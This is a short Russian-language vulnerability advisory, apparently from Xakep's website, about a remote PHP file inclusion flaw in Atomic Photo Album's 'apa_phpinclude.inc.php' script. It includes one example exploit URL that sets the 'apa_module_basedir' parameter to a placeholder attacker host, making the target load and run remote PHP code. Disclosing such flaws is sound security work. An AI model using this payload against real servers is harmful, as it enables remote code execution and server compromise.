PHP-инклюдинг в Atomic Photo Album

Рекомендуем почитать:

Xakep #302. PHDays Fest 2

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Atomic Photo Album

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует в сценарии 'apa_phpinclude.inc.php' из-за
недостаточной обработки входных данных в
параметре 'apa_module_basedir'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
PHP сценарий на целевой системе.

Пример:

http://[target]/[dir]/apa_phpinclude.inc.php? apa_module_basedir=http://[attacker]/

PHP-инклюдинг в Atomic Photo Album

Xakep #302. PHDays Fest 2

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Недетский контроль. Настраиваем Linux для ребенка

Разгадайка. Пишем собственный деобфускатор для JavaScript

Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше

CobInt. Разбираем известный бэкдор и практикуемся в реверсе

Трюки

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Последние новости

Французские власти уничтожают PlugX на зараженных устройствах

Замедление YouTube прокомментировали в Роскомнадзоре и не только

В Docker патчат критическую уязвимость пятилетней давность, связанную с обходом аутентификации

Google Chrome будет предупреждать об опасности защищенных паролем архивов

BI.ZONE: 85% фишинговых сообщений замаскированы под финансовые документы и письма госорганов